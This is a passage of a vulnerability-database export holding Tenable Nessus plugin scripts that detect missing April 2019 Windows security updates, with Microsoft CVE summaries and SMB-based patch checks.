script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4493467\nor cumulative update 4493446. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0803, CVE-2019-0859)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\");\n # https://support.microsoft.com/en-us/help/4493446/windows-8-1-update-kb4493446\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60dedb61\");\n # https://support.microsoft.com/en-us/help/4493467/windows-8-1-update-kb4493467\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c9ecc3f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4493467 or Cumulative Update KB4493446.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-04\";\nkbs = make_list('4493467', '4493446');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"04_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4493467, 4493446])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:26", "description": "The remote Windows host is missing security update 4493475.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0803, CVE-2019-0859)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0848)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-0739)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-0806, CVE-2019-0810,\n CVE-2019-0812, CVE-2019-0860, CVE-2019-0861)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "KB4493475: Windows 10 April 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0812", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0859", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0849", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "modified": "2019-04-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS19_APR_4493475.NASL", "href": "https://www.tenable.com/plugins/nessus/123947", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123947);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2019-0688\",\n \"CVE-2019-0730\",\n \"CVE-2019-0731\",\n \"CVE-2019-0732\",\n \"CVE-2019-0735\",\n \"CVE-2019-0739\",\n \"CVE-2019-0752\",\n \"CVE-2019-0753\",\n \"CVE-2019-0764\",\n \"CVE-2019-0790\",\n \"CVE-2019-0791\",\n \"CVE-2019-0792\",\n \"CVE-2019-0793\",\n \"CVE-2019-0794\",\n \"CVE-2019-0795\",\n \"CVE-2019-0796\",\n \"CVE-2019-0802\",\n \"CVE-2019-0803\",\n \"CVE-2019-0805\",\n \"CVE-2019-0806\",\n \"CVE-2019-0810\",\n \"CVE-2019-0812\",\n \"CVE-2019-0835\",\n \"CVE-2019-0836\",\n \"CVE-2019-0838\",\n \"CVE-2019-0839\",\n \"CVE-2019-0842\",\n \"CVE-2019-0844\",\n \"CVE-2019-0845\",\n \"CVE-2019-0846\",\n \"CVE-2019-0847\",\n \"CVE-2019-0848\",\n \"CVE-2019-0849\",\n \"CVE-2019-0851\",\n \"CVE-2019-0853\",\n \"CVE-2019-0856\",\n \"CVE-2019-0859\",\n \"CVE-2019-0860\",\n \"CVE-2019-0861\",\n \"CVE-2019-0862\",\n \"CVE-2019-0877\",\n \"CVE-2019-0879\"\n );\n script_xref(name:\"MSKB\", value:\"4493475\");\n script_xref(name:\"MSFT\", value:\"MS19-4493475\");\n\n script_name(english:\"KB4493475: Windows 10 April 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4493475.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0803, CVE-2019-0859)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0848)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-0739)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-0806, CVE-2019-0810,\n CVE-2019-0812, CVE-2019-0860, CVE-2019-0861)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\");\n # https://support.microsoft.com/en-us/help/4493475/windows-10-update-kb4493475\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f28d8c79\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4493475.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-04\";\nkbs = make_list('4493475');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"04_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4493475])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:25", "description": "The remote Windows host is missing security update 4493470.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An information disclosure vulnerability exists when the\n Windows 